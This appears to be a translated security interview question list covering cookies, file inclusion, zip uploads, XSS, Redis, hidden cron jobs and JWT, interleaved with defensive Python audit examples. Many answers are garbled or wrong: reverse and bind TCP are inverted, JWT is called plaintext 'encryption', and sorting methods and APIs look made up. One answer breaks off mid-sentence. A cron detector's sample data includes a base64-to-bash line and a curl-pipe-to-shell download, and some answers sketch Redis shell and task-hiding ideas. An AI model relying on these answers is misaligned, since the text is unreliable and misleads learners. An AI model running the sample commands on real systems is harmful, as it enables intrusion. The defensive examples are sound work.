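The defence points above are mostly about the server-side handling of the code rather than the image itself. The block below is an added example, not from the original page, of that handling: an exact (no trimming, no case folding) constant-time comparison, a fresh random code per challenge, single use, expiry, and a capped number of attempts so the code cannot be brute-forced or replayed. The clock, TTL and attempt limit are assumptions; rendering the code as an image is left to the caller.

```python
"""Server-side handling of a verification code that implements the defence
points above: exact comparison, a fresh code per challenge, single use,
expiry and a capped number of attempts.

Added example, not from the original page. The clock, TTL and attempt limit
are assumptions; rendering the code as an image is left to the caller.
"""
import hmac
import secrets
import string
import time

ALPHABET = string.ascii_uppercase + string.digits


class CaptchaStore:
    def __init__(self, ttl_seconds=120, max_attempts=3, length=6, clock=time.time):
        self.ttl = ttl_seconds
        self.max_attempts = max_attempts
        self.length = length
        self.clock = clock                # injectable for testing
        self._pending = {}                # challenge_id -> [answer, expires_at, attempts_left]

    def issue(self):
        """Create a new challenge; the answer goes to the image renderer only."""
        answer = "".join(secrets.choice(ALPHABET) for _ in range(self.length))
        cid = secrets.token_urlsafe(16)
        self._pending[cid] = [answer, self.clock() + self.ttl, self.max_attempts]
        return cid, answer

    def verify(self, cid, user_input):
        rec = self._pending.get(cid)
        if rec is None:
            return False                  # unknown, expired or already used
        answer, expires_at, attempts_left = rec
        if self.clock() > expires_at:
            del self._pending[cid]
            return False
        # Exact match: no trimming or case folding, and constant-time compare.
        ok = hmac.compare_digest(answer.encode(), (user_input or "").encode())
        if ok or attempts_left <= 1:
            del self._pending[cid]        # single use; or attempts exhausted
        else:
            rec[2] = attempts_left - 1
        return ok
```

The challenge identifier is what the client sends back, never the answer, so the form cannot be replayed with a previously solved code; the attempt cap is what actually stops brute force, since a six-character code over 36 symbols is trivial to enumerate if the server allows unlimited guesses against one challenge.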

56. What content will you test for cookies?

1. Check whether the cookie value is as expected.

2. Test whether the cookie is deleted correctly according to the set validity period.

3. Check cookies for security vulnerabilities.

4. Test whether the cookie is stored on the client side in a secure manner.

5. Check whether the cookie value is tracked across sites. This type of cookie is used for illegal purposes.

6. Test the compatibility of cookies on different browsers.

7. Check whether the cookie value is encoded to prevent attackers from obtaining valid data.

8. Check whether the URI path is set correctly to ensure that the cookie is sent correctly.

9. Check whether cookie preference settings are strict to ensure security.

10. Check that all data sent to cookies is encoded, compressed or encrypted to prevent unauthorized third-party access.
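Most of the checks above can be read straight off the Set-Cookie header. The block below is an added example, not from the original page, that parses a Set-Cookie header and reports missing Secure/HttpOnly, a weak SameSite, an over-broad Domain, a session cookie that has been made persistent, unmet `__Host-` prefix rules, and a value that is not an opaque encoded token. The sample headers are constructed.

```python
"""Auditing Set-Cookie headers for the attributes the checklist above asks
about (Secure, HttpOnly, SameSite, Path/Domain scope, expiry, opaque value).

Added example, not from the original page; the sample headers are constructed.
"""
import re


def parse_set_cookie(header):
    """Split a Set-Cookie header into (name, value, {attribute: value|True})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return name.strip(), value.strip(), attrs


def audit_cookie(header, session_cookie=True):
    """Return a list of findings; an empty list means the cookie passes."""
    name, value, attrs = parse_set_cookie(header)
    findings = []
    if "secure" not in attrs:
        findings.append("missing Secure")
    if session_cookie and "httponly" not in attrs:
        findings.append("missing HttpOnly")
    if str(attrs.get("samesite", "")).lower() not in ("lax", "strict"):
        findings.append("SameSite is not Lax or Strict")
    if "domain" in attrs:
        findings.append(f"Domain={attrs['domain']} shares the cookie with every subdomain")
    if session_cookie and ("expires" in attrs or "max-age" in attrs):
        findings.append("session cookie is persistent")
    if name.startswith("__Host-") and (
        "domain" in attrs or attrs.get("path") != "/" or "secure" not in attrs
    ):
        findings.append("__Host- prefix requirements not met")
    if not re.fullmatch(r"[A-Za-z0-9_\-%.~]*", value):
        findings.append("value is not an opaque, encoded token")
    return findings


# Constructed sample headers
GOOD = "__Host-session=8f1a2c9d4e6b; Path=/; Secure; HttpOnly; SameSite=Lax"
WEAK = "sessionid=abc123; Path=/; Expires=Wed, 01 Jan 2025 00:00:00 GMT"
LEAKY = 'user={"role":"admin"}; Secure; HttpOnly; SameSite=Strict'
```

The last check is the cheap version of points 7 and 10: a session cookie should carry a random identifier, not readable state. A cookie whose value is JSON with a role field is a sign that authorization decisions are being made from client-held data, which is a logic flaw regardless of how the cookie is flagged.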

57. Name several types of business logic vulnerabilities?

1. Permission control vulnerability: Attackers use vulnerabilities to bypass system access restrictions and obtain high-privilege unauthorized access.

2. Functional attack vulnerability: The attacker maliciously tampers with the file structure or system information to achieve the desired effect of auxiliary operations.

3. Override of privileges vulnerability: An attacker exploits the vulnerability to gain access to protected system resources with unauthorized access.

4. Data control vulnerabilities: Attackers can use vulnerabilities to tamper with some protected data and information in the system and change their original uses.

5. Virtualization vulnerability: An attacker can obtain protected virtual machine resources or access data in a controlled dedicated virtual machine.

6. Privilege escalation vulnerability: The attacker logs in as a general user and obtains the highest authority of the system through the vulnerability.

7. Database vulnerabilities: Attackers can also access the protected database information of the system through injection, database brute force cracking and other means.

8. Coverage signature attack: The attacker tampers with the data in the communication between the two parties and forges the return signal to impersonate the other party.

9. Buffer overflow vulnerability: An attacker uses buffer content overflow to obtain protected data in system memory.

10. Session fixation vulnerability: Attackers use session fixation technology to obtain the identity information of other users.

58. Briefly describe file inclusion vulnerabilities

A file inclusion vulnerability is a security vulnerability that causes files on the server to be illegally accessed. This vulnerability is usually caused by improper web programming implementation, allowing attackers to read data on the server from external files. In web applications, such as forms and URL parameters, developers often allow submission of information with specific values, including the path and file name of a file, so that the web application can load the corresponding file. If an attacker is able to control the provided filename, they can obtain files containing sensitive information from the server.
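The fix for the situation described above is to never let the submitted name choose the file directly. The block below is an added example, not from the original page: the application maps a page name to a file under a fixed template directory, appends the extension itself, rejects NUL bytes, and checks the resolved real path is still under that directory. The directory layout is constructed in a temporary folder so the example runs anywhere.

```python
"""Resolving a user-supplied page name so the include can never leave the
template directory (path traversal, absolute paths, NUL truncation).

Added example, not from the original page. The directory layout is created
in a temporary directory so the example runs anywhere.
"""
import os
import tempfile

TEMPLATE_EXT = ".tpl"


class IncludeRejected(ValueError):
    pass


def resolve_include(template_dir, page):
    """Map 'home' to <template_dir>/home.tpl, refusing anything that escapes."""
    if not page or "\0" in page:
        raise IncludeRejected("empty page name or NUL byte")
    base = os.path.realpath(template_dir)
    candidate = os.path.realpath(os.path.join(base, page + TEMPLATE_EXT))
    # realpath collapses '..' and follows symlinks; the result must stay under base
    if os.path.commonpath([base, candidate]) != base:
        raise IncludeRejected("path escapes the template directory")
    if not os.path.isfile(candidate):
        raise IncludeRejected("no such template")
    return candidate


def include_page(template_dir, page):
    """Return (True, content) or (False, reason)."""
    try:
        path = resolve_include(template_dir, page)
    except IncludeRejected as exc:
        return False, str(exc)
    with open(path, encoding="utf-8") as f:
        return True, f.read()


def make_demo_site():
    """Constructed layout: <root>/tpl/home.tpl is includable, <root>/secret.txt
    is not. Returns the template directory."""
    root = tempfile.mkdtemp()
    tpl = os.path.join(root, "tpl")
    os.mkdir(tpl)
    with open(os.path.join(tpl, "home.tpl"), "w", encoding="utf-8") as f:
        f.write("home page")
    with open(os.path.join(root, "secret.txt"), "w", encoding="utf-8") as f:
        f.write("not for include")
    return tpl
```

An explicit allow-list of page names is simpler still when the set is small; the real-path check is what covers the general case, including symlinks inside the template directory that point elsewhere. Note that `os.path.join` discards the base when the second argument is absolute, which is exactly why the check is done on the resolved result rather than on the input string.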

59. What are some examples of business logic vulnerabilities and arbitrary password resets by users, and what factors caused them?

A typical example of a user's arbitrary password reset vulnerability is that the user does not fill in a secure email address or set a security question when registering, but can still reset the password at will. This kind of vulnerability is generally caused by the lack of a complete security verification mechanism in some application systems and insufficient security protection measures to prevent unauthenticated users from resetting their passwords from the outside, which leads to the occurrence of this security vulnerability.

60. During the penetration test, I found a function that can only upload zip files. What possible ideas are there?

1. Try to bypass extension restrictions and upload other file types, such as asp/PHP/exe files, to try to access files or execute programs;

2. Compress the malicious php file into zip format, and then upload it;

3. Try to change the file structure of the zip and crack the internal files;

4. Spread malicious programs to other users or systems through zip file Trojan injection;

5. Try to decrypt the zip file protected by the uncompressed password, embodying the second layer of backdoor in an invisible place;

6. Try to obtain hidden malicious code and information by extracting file information from zip files;

7. After trying to upload the zip file, the original complete form of the compressed package is still maintained;

8. Try to find that the file information in the zip is not processed, and a vulnerability occurs;

9. Try to extract additional code with side effects from the zip;

10. Check the size of uploaded files and try to compress files that are too large before uploading;

11. Try to combine the characteristics of the compressed file itself to carry out DoS (denial of service) attack on the target system;

12. Reverse engineer the zip file and find information that can be used in the character sequence;

13. Attempt a magic box attack where a zip file is uploaded and then tampered with when downloaded, causing ";
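Seen from the server that receives the zip, items 3 and 11 above (altered archive structure, compression-based denial of service) and the traversal variant of item 2 are all things to check before extracting anything. The block below is an added example, not from the original page: it reads the central directory, refuses entries with absolute or `..` paths, disallowed types, an excessive inflation ratio or total size, and shows a constructed hostile archive beside a clean one. The limits are assumptions.

```python
"""Inspecting an uploaded zip before anything is extracted: entry paths,
entry types and inflation ratio (the denial-of-service point above).

Added example, not from the original page. The archives are built in memory
and the limits are assumptions.
"""
import io
import posixpath
import zipfile

ALLOWED_EXT = {".txt", ".csv", ".png", ".jpg"}
MAX_ENTRIES = 100
MAX_TOTAL_UNCOMPRESSED = 50 * 1024 * 1024
MAX_RATIO = 100                      # uncompressed / compressed per entry


def inspect_zip(data):
    """Return [] when the archive is acceptable, otherwise the reasons to reject it."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return ["not a valid zip"]
    reasons = []
    infos = zf.infolist()
    if len(infos) > MAX_ENTRIES:
        reasons.append("too many entries")
    total = 0
    for info in infos:
        name = info.filename
        # Zip-slip: absolute paths, backslashes, drive letters or '..' components.
        if (name.startswith(("/", "\\")) or "\\" in name
                or ":" in name.split("/")[0]
                or posixpath.normpath(name).startswith("..")):
            reasons.append(f"unsafe path {name!r}")
        if info.is_dir():
            continue
        if posixpath.splitext(name)[1].lower() not in ALLOWED_EXT:
            reasons.append(f"disallowed type {name!r}")
        total += info.file_size
        if info.compress_size and info.file_size / info.compress_size > MAX_RATIO:
            reasons.append(f"suspicious compression ratio in {name!r}")
    if total > MAX_TOTAL_UNCOMPRESSED:
        reasons.append("declared uncompressed size over limit")
    return reasons


def build_good_zip():
    """Constructed clean archive."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("notes.txt", "quarterly notes")
        zf.writestr("img/pic.png", b"\x89PNG\r\n\x1a\n" + b"\0" * 32)
    return buf.getvalue()


def build_bad_zip():
    """Constructed hostile archive: traversal path, script file, highly compressible blob."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("../../outside.txt", "escaped the extraction directory")
        zf.writestr("script.php", "<?php echo 1; ?>")
        zf.writestr("filler.txt", b"\0" * 1_000_000)
    return buf.getvalue()
```

The sizes in the central directory are attacker-supplied metadata, so this inspection is a pre-filter, not the last line of defence: the extraction step itself must read each member in chunks and abort once the running byte count passes the limit, and must write only to paths it has resolved under the target directory.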

61. Why does the aspx Trojan have greater permissions than asp?

Because the permissions of ASP pages only have simple executable permissions, while ASPX pages have permissions similar to those of a complete file system, allowing attackers to achieve more functions, such as accessing system files, viewing remote databases, adding new users, etc.

62. What are the ideas for having only one login page?

1. Detect client-side and server-side vulnerabilities in the page, such as XSS, SQL injection, etc.

2. Enumerate administrator usernames and try common passwords.

3. Test the information in the HTTP header, such as allowing cross-site scripting (XSS) in the HTTP header to prevent caching of information, etc.

4. Attempt brute force password cracking and keep trying to log in until you get the correct username and password.

5. Attempt to inject a payload into the login form to bypass the authentication process.

6. Check and test all available APIs to determine if any vulnerabilities exist.

7. Check whether the SSL/TLS certificate of the login page is valid.

8. Try accessing specific folders on the login page to see if there are any exploitable permissions issues.

9. Check whether the username and password are stored in clear text.

10. Try to let the browser inject payload into the login form by erasing cookies, modifying cookies and request header information, etc.

63. Which request headers are dangerous?

Malicious HTTP headers include:

1. X-Forwarded-For: This header indicates the IP address of the client in the HTTP request. Some clients see this header and send it to the web server to weaken client security.

2. Cookies: Cookies are the only way for web applications to identify users. If an attacker can tamper with cookies and plant malicious values into them, it may lead to unauthorized access.

3. User-Agent: Some attackers may change this header to hide their hardware and operating system models.

4. Referer: This header tracks where the user comes from. Malicious attackers may use this header to send users links to malicious websites.

64. Talk about the difference between horizontal/vertical/unauthorized access?

Horizontal unauthorized access occurs when a user attempts to access another user's account or resources while holding no higher privilege level than that user. Preventing horizontal override is very important for security: users may only access their own content, not that of another user.

Vertical unauthorized access means that a user who has been authorized at one level can obtain higher-level permissions; that is, the user is not granted the higher-level access yet is able to perform it. For example, a user who is only allowed to view articles on a website but can add and modify articles has performed vertical unauthorized access.

Unauthorized access refers to a user attempting to access a user or resource they have no authorization for. This is illegal behavior, and the access should be denied as soon as it is discovered. Unauthorized overrides can compromise system integrity or result in the loss of private data, so this is a very serious issue.
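In code, the distinction above is between a role-level check (can this kind of user perform this action at all) and an object-level check (does this particular object belong to this user), and a service needs both. The block below is an added example, not from the original page, that applies the two checks in order and reports which one failed. The users, roles and article store are constructed.

```python
"""Object-level (horizontal) and role-level (vertical) authorization checks
side by side, so the two kinds of unauthorized access above are told apart.

Added example, not from the original page. Users, roles and the article
store are constructed.
"""
from dataclasses import dataclass

ROLE_RANK = {"reader": 0, "author": 1, "admin": 2}
REQUIRED_ROLE = {"view": "reader", "edit": "author", "delete": "admin"}


@dataclass
class User:
    id: int
    role: str


@dataclass
class Article:
    id: int
    owner_id: int
    body: str


class Forbidden(Exception):
    def __init__(self, kind, detail):
        super().__init__(detail)
        self.kind = kind   # "vertical" or "horizontal"


class ArticleService:
    def __init__(self, articles):
        self._articles = {a.id: a for a in articles}

    def _authorize(self, user, article, action):
        # Vertical: the role must rank at least as high as the action requires.
        if ROLE_RANK[user.role] < ROLE_RANK[REQUIRED_ROLE[action]]:
            raise Forbidden("vertical", f"{user.role} may not {action}")
        # Horizontal: the same role may only touch its own objects (admins excepted).
        if action != "view" and user.role != "admin" and article.owner_id != user.id:
            raise Forbidden("horizontal", f"user {user.id} does not own article {article.id}")

    def perform(self, user, action, article_id, body=None):
        article = self._articles[article_id]
        self._authorize(user, article, action)   # check before any state change
        if action == "edit":
            article.body = body
        elif action == "delete":
            del self._articles[article_id]
        return article


def try_action(service, user, action, article_id, body=None):
    """Return 'ok', 'vertical' or 'horizontal' for a test harness."""
    try:
        service.perform(user, action, article_id, body)
        return "ok"
    except Forbidden as exc:
        return exc.kind


def build_demo():
    """Constructed users and articles."""
    users = {"alice": User(1, "author"), "bob": User(2, "author"),
             "carol": User(3, "reader"), "root": User(4, "admin")}
    service = ArticleService([Article(1, 1, "alice's draft"), Article(2, 2, "bob's draft")])
    return users, service
```

The most common horizontal bug is a handler that checks the role and then loads the object by the id in the request without the ownership comparison; putting both checks in one `_authorize` that every action must call makes the omission harder to ship. Testing each action with a same-role non-owner (bob on alice's article) is the direct test for it.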

65. What is xss? The dangers and principles of executing stored xss

XSS (cross-site scripting attack) is a common network attack and a classic front-end vulnerability, which can be traced to the lack of security filtering of parameters during server-side command processing. There are many types of XSS. The dangers of performing stored XSS attacks are:

1. Full execution that can be controlled by the attacker and can be achieved without user interaction;

2. Store executable code on the server to obtain user information through scripting technology;

3. Attach malicious code to normal pages and provide users with unwanted third-party content, or pop up false promotional windows.

The principle of executing stored XSS is: the server side does not filter out special characters when processing parameters and injects malicious scripts into the server side; when a user accesses a page with a malicious script, the script is automatically executed, allowing the attacker to control user's session to perform more attacks.

66. The host is suspected to be invaded. Where should I check the logs?

Where to look for logs depends on the specific operating system. You can usually look at various log files under /var/log, such as operating system security logs, application log files, etc. In addition, you can also check the system firewall logs, including access denial records on the server, and network traffic logs.

67. Commonly used standard libraries in python

1. Operating system interface: os, os.path, subprocess, shutil;

2. File wildcard: glob;

3. String processing: re, string, difflib, textwrap, unicodedata;

4. Data encoding and processing: base64, codecs, csv, xml;

5. Mathematics: decimal, fractions, math, random, statistics;

6. Date and time: datetime, time;

7. Split and merge data: collections, copy, heapq, bisect;

8. Data compression and archiving: zlib;

9. File loader: fnmatch;

10. Flow control and seeds: itertools;

11. Threads and processes: threading, multiprocessing;

12. Debugger: pdb;

13. Software packages: pkgutil, modulefinder, zipimport;

14. System and environment: sys, warnings, contextlib, platform, getopt, argparse;

15. Internet data processing: urllib, urllib2, http, smtplib, poplib, imaplib, ftplib, telnetlib;

16. Others: struct, copyreg, shelve, weakref.

68. What is the difference between reverse tcp and bind tcp?

There are two ways for TCP to establish a connection: Reverse TCP and Bind TCP.

Reverse TCP is a "reverse" connection between client and server, in that the client will attempt to connect to the server, and the server will then return an acknowledgment of the connection. This is the most common Transmission Control Protocol (TCP) connection model, like the HTTP connection between the client browser and the server.

Bind TCP means that the server waits for the client's connection. The server actively issues a "bind" request and then waits for the client to respond. If the client responds, the connection is successfully established. This is the model used when the client logs in to the FTP server, that is, the server listens to a certain port and waits for the client to access.

69. What problems may occur during the oauth authentication process and what kind of vulnerabilities may result?

1. Vulnerabilities that may occur during the authentication process include: incorrect authentication information, unsafe authentication information, unreliable authentication callbacks, misuse of authentication information, etc.

2. These problems may lead to vulnerabilities such as attackers stealing access tokens, injecting malicious requests, tampering with network data, and stealing users' private information.

70. How to obtain the real IP for a website that has a CDN

1. Read the real IP from X-Forwarded-For: if the CDN sets the X-Forwarded-For header, the origin server can read the client's real IP address from it.

2. Use the CDN API: some CDN services provide an API through which the client's real IP address can be obtained directly.

3. Read the real IP from other HTTP headers: if the CDN adds its own HTTP header carrying the client address, the origin server can read the client's real IP from that header.

4. Use Google's open API: Google's open geolocation API can be queried with the client's IP address to obtain the client's real IP address.

5. Use a third-party IP query API: a third-party IP query API can be used to obtain the client's real IP address.

6. Inspect the HTTP request packet directly: capture the source IP address of the HTTP request on the server side to obtain the client's real IP address.

7. Use IPv6 address identification: detecting IPv6 addresses can identify the real IP address of the end user.

8. Read the real IP from firewall logs: the client's real IP address can be obtained from firewall logs.

9. Read the real IP from server logs: the client's real IP address can also be identified from server logs.

10. Use the NETGEAR ACE API: the NETGEAR ACE API can be used to obtain the client's real IP address.
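For item 1, the caveat a defender wants is that X-Forwarded-For is client-supplied and can be forged: the origin must trust only the entry appended by the CDN hop it actually received the request from. The following is an added example (not from the original article) that resolves the client IP that way; the trusted CDN ranges are constructed placeholders.

```python
import ipaddress
from typing import Optional

# Constructed sample: address ranges of the CDN edges we trust to append
# X-Forwarded-For. In production, load the CDN provider's published ranges.
TRUSTED_PROXIES = [
    ipaddress.ip_network("203.0.113.0/24"),
    ipaddress.ip_network("2001:db8:c0::/48"),
]


def _is_trusted(addr: str) -> bool:
    """True if addr parses as an IP inside one of the trusted CDN ranges."""
    try:
        ip = ipaddress.ip_address(addr.strip())
    except ValueError:
        return False
    return any(ip in net for net in TRUSTED_PROXIES)


def client_ip(remote_addr: str, xff_header: Optional[str]) -> str:
    """Return the real client IP behind the CDN.

    remote_addr is the TCP peer that delivered the request. If it is not a
    trusted CDN edge, the request bypassed the CDN and the header is ignored.
    Otherwise, walk the X-Forwarded-For chain from the right (the entry the
    nearest trusted hop appended) and stop at the first untrusted address.
    Anything to the left of that point was supplied by the client itself.
    """
    if not _is_trusted(remote_addr):
        return remote_addr
    hops = [h.strip() for h in (xff_header or "").split(",") if h.strip()]
    for hop in reversed(hops):
        if not _is_trusted(hop):
            try:
                return str(ipaddress.ip_address(hop))
            except ValueError:
                break  # malformed entry: fall back to the peer address
    return remote_addr
```
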

71. How to achieve cross-domain?

Cross-domain refers to the browser's same-origin restriction: a page loaded from one origin is prevented from loading content from another origin. That content may be static files such as JavaScript and CSS, or data generated dynamically on the server.

1. Use JSONP to achieve cross-domain:

    JSONP (JSON with Padding) loads a script from another domain into the current page through a script tag, which is not subject to the same-origin restriction, and so allows cross-domain data transmission by calling a script file across domains.

2. Use CORS to achieve cross-domain:

    CORS (Cross-Origin Resource Sharing) is a mechanism for cross-origin requests that allows the browser to send and receive cross-origin HTTP requests for cross-domain data transmission.

3. Use an Nginx proxy to achieve cross-domain:

    The Nginx approach applies to HTTP requests initiated by Ajax. Using Nginx's reverse-proxy capability, the request the client sends to the Nginx server is forwarded to the origin server, and the origin server's response is returned to the client through Nginx, so the browser never sees a cross-origin request.

72. What is the difference between jsonp cross-domain and CORS cross-domain?

1. JSONP is a script-based technique that can solve cross-domain problems and can be used in browsers that do not support CORS. CORS is a mechanism that allows the browser to send a resource from one domain name to another domain name.

2. JSONP is not an Ajax request in the traditional sense, but CORS is an Ajax request in the traditional sense.

3. The JSONP cross-domain process is initiated by the browser, while the CORS cross-domain process is initiated by the server.

4. JSONP has its own script tag and callback function, while CORS performs cross-domain operations based on HTTP header information.

5. JSONP only supports get requests, while CORS supports all types of HTTP requests.

73. Algorithms? What sorting have you learned about?

Sorting algorithms are generally divided into two categories: internal sorting and external sorting.

Internal sorting: bubble sort, insertion sort, selection sort, Shell sort, merge sort, quick sort, heap sort, etc.

External sorting: external sorting, record aggregation sorting, bucket sorting, file merge sorting, etc.

The sorting algorithms I know are: bubble sort, insertion sort, selection sort, quick sort, Shell sort, merge sort, heap sort, bucket sort, record aggregation sort and external sort.

74. SSRF vulnerability exploitation?

SSRF vulnerability exploitation is an attack technique that exploits the Server Side Request Forgery vulnerability to allow attackers to construct special HTTP requests to access server resources on the internal network. Attackers can exploit SSRF vulnerabilities to obtain sensitive information on the internal network and even control servers on the internal network.

75. Common backdoor methods?

1. Backdoor program: An attacker can install a backdoor program in the system to gain access to the system.

2. Backdoor account: An attacker can create a backdoor account to gain access to the system.

3. Backdoor service: An attacker can install a backdoor service in the system to gain access to the system.

4. Backdoor port: An attacker can open a backdoor port in the system to gain access to the system.

5. Backdoor file: An attacker can create a backdoor file in the system to gain access to the system.

6. Backdoor network: An attacker can create a backdoor network in a system to gain access to the system.

7. Backdoor script: An attacker can create a backdoor script in the system to gain access to the system.

8. Backdoor program replacement: An attacker can replace a backdoor program in the system to gain access to the system.

76. How to bypass directory access restrictions in open_basedir?

1. Using the absolute path of open_basedir: An attacker can use the absolute path of open_basedir to bypass the restrictions of open_basedir and access other directories on the system.

2. Using the relative path of open_basedir: An attacker can use the relative path of open_basedir to bypass the restrictions of open_basedir and access other directories on the system.

3. Using open_basedir's path traversal: An attacker can use open_basedir's path traversal to bypass the restrictions of open_basedir and access other directories on the system.

4. Using open_basedir's path enumeration: An attacker can use open_basedir's path enumeration to bypass the restrictions of open_basedir and access other directories on the system.

5. Using open_basedir's path replacement: An attacker can use open_basedir's path replacement to bypass the restrictions of open_basedir and access other directories on the system.

77. What are the common problems in PHP code audit?

1. Database query: SQL injection, cross-site scripting attack (XSS), remote file inclusion (RFI), etc.

2. File upload: file upload vulnerabilities, file inclusion vulnerabilities, etc.

3. Permission control: authorization bypass, unauthorized access, etc.

4. Data transmission: data encryption, data signature, etc.

5. Network security: network attacks, malicious code, etc.

6. System security: system vulnerabilities, malicious programs, etc.

7. Others: buffer overflow, path traversal attacks, etc.

78. In a red-blue confrontation, what are the scenarios and techniques for the blue team counterattacking the red team?

Phishing, honeypots, RCE against AntSword (the "Ant Sword" webshell client)

79. Linux scheduled tasks, what would a hacker do to hide his scheduled tasks?

1. Use the crontab -e command to edit the crontab file and add the scheduled task to it, but not in plain text: store the command in an encoded form, such as base64.

2. Place the scheduled task in a hidden folder and give the folder a hidden name to prevent others from discovering it.

3. Use the hidden file function of Linux to set the scheduled task file as a hidden file to prevent others from discovering it.

4. Use the file permissions function of Linux to set the scheduled task file to read-only to prevent others from modifying it.

5. Use the file attribute function of Linux to set the scheduled task file to be invisible to prevent others from discovering it.

6. Use Linux's file system encryption function to encrypt scheduled task files to prevent others from cracking them.

7. Use the hidden process function of Linux to set the scheduled task process to be hidden to prevent others from discovering it.

8. Use the hidden port function of Linux to set the scheduled task port to be hidden to prevent others from discovering it.

9. Use the hidden network function of Linux to set the scheduled task network to be hidden to prevent others from discovering it.

10. Use the hidden file system function of Linux to set the scheduled task file system to be hidden to prevent others from discovering it.
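Items 1 to 3 are what a defender can actually look for: encoded commands and hidden paths stand out in a crontab even when the entry itself is hard to find. The following added example (not from the original article) audits constructed cron lines, collected from /etc/crontab, /etc/cron.d and the spool directory, and flags those patterns.

```python
import re
from typing import Dict, List

# Constructed sample of crontab lines as collected from /etc/crontab,
# /etc/cron.d/* and /var/spool/cron/crontabs/* (not from a real host).
# Line 4 decodes to "echo hidden"; line 6 uses a documentation IP.
SAMPLE_CRON = """\
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root /usr/bin/backup --quiet
* * * * * www-data echo ZWNobyBoaWRkZW4= | base64 -d | bash
@reboot root /var/tmp/.cache/.x/run.sh
0 3 * * * root curl -s http://203.0.113.9/u.sh | sh
"""

# Patterns matching the hiding techniques listed above, in check order.
SUSPICIOUS = [
    (re.compile(r"base64\s+(-d|--decode)"), "inline base64-decoded command"),
    (re.compile(r"(^|[\s/])\.[^\s/]+/"), "hidden directory in path"),
    (re.compile(r"/(tmp|var/tmp|dev/shm)/"), "runs from a world-writable temp dir"),
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "downloads and pipes to a shell"),
]


def audit_cron(text: str) -> List[Dict[str, object]]:
    """Return one finding per non-comment cron line that matches any pattern.

    Each finding carries the 1-based line number, the entry text and the
    list of reasons, so it can be fed straight into an alert or a ticket.
    """
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        reasons = [why for rx, why in SUSPICIOUS if rx.search(entry)]
        if reasons:
            findings.append({"line": lineno, "entry": entry, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_cron(SAMPLE_CRON):
        print(f"line {f['line']}: {', '.join(f['reasons'])}\n    {f['entry']}")
```

Items 4 to 6 (read-only permissions, immutable attributes, encrypted files) are not visible in the text, so pair this with a comparison of file attributes and modification times across the cron directories.
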

80. What are the common ways to get a shell through Redis unauthorized access?

1. Exploit the unauthorized access vulnerability of Redis to obtain remote control by writing webshell;

2. Upload the webshell file to the Redis server, and then read the file content in Redis;

3. Exploit the unauthorized access vulnerability of Redis to obtain remote control by executing arbitrary commands on the Redis server;

4. Exploit the unauthorized access vulnerability of Redis, store the Trojan file as a string in Redis, and then call the Trojan in Redis to obtain remote control;

5. If Redis enables the RDB mode backup function, you can hide the webshell file in the backup file, and then read the file content in Redis;

6. If Redis enables the AOF mode persistence function, you can write the webshell file as an execution command to the AOF file, and then read the file content in Redis;

7. If Redis enables the master-slave structure, you can transfer the webshell file to the slave library as data, and then read the file content in Redis.

8. If Redis allows the client to execute scripts, you can transfer the webshell file to Redis as a script, and then execute the script in Redis to obtain remote control.

9. Use the Redis message queue function to send the webshell file to Redis as a message, and then read the file content in Redis.

10. If Redis allows clients to use the EVAL command, you can send the webshell file to Redis as a LUA script and execute the script to obtain remote control.
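Every item above depends on a client reaching Redis without a password and being able to make it write a file somewhere useful. The following added example (not from the original article) audits a redis.conf for exactly those preconditions; both configuration excerpts are constructed.

```python
from typing import Dict, List

# Constructed redis.conf excerpts (not from a real deployment): an instance
# exposed with defaults, and a hardened one.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
dir /var/www/html
"""

HARDENED_CONF = """\
bind 127.0.0.1 ::1
protected-mode yes
port 6379
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
dir /var/lib/redis
rename-command CONFIG ""
rename-command FLUSHALL ""
rename-command DEBUG ""
"""


def parse_conf(text: str) -> Dict[str, List[str]]:
    """Map each directive to the list of its argument strings (directives may repeat)."""
    conf: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, _, args = line.partition(" ")
        conf.setdefault(name.lower(), []).append(args.strip())
    return conf


def audit_redis_conf(text: str) -> List[str]:
    """Return the settings that enable the write-a-file-then-run-it chains above.

    An empty list means none of the checked issues apply.
    """
    conf = parse_conf(text)
    issues: List[str] = []

    # No bind line at all means every interface; wildcard binds are equivalent.
    binds = " ".join(conf.get("bind", [])).split()
    if not binds or any(b in ("0.0.0.0", "::", "*") for b in binds):
        issues.append("bind: listens on all interfaces")

    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        issues.append("protected-mode: disabled")

    if not conf.get("requirepass") or conf["requirepass"][-1].strip('"') == "":
        issues.append("requirepass: no password, unauthenticated clients accepted")

    data_dir = conf.get("dir", ["./"])[-1]
    if any(data_dir.startswith(p) for p in ("/var/www", "/srv/www", "/usr/share/nginx")):
        issues.append(f"dir: {data_dir} is under a web root, so an RDB dump can land as a webshell")

    # CONFIG SET dir/dbfilename is what lets a client choose where the dump goes.
    disabled = {a.split()[0].upper() for a in conf.get("rename-command", []) if a.endswith('""')}
    if "CONFIG" not in disabled:
        issues.append("rename-command: CONFIG is reachable, so clients can redirect dir/dbfilename")

    return issues
```
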

81. JWT attack methods? (Header, payload, signature)

1. Utilize JWT overwriting attack: Use another JWT to overwrite the previous JWT, so that the session remains in the old JWT, and the server cannot sense this overwriting behavior, thus creating a feasible vulnerability for the attacker.

2. Exploiting JWT encryption attacks: Since JWT is saved in clear text, an attacker can try to crack the JWT, steal the token, decode and send a request to access the protected resource.

3. Utilize JWT tampering attacks: tamper with the payload or header information in the JWT, thereby changing the content or scope of the request.

4. Utilize JWT payload update attack: The attacker updates its permissions by adding additional payloads to the JWT, thereby obtaining resources that are not authorized to be accessed.

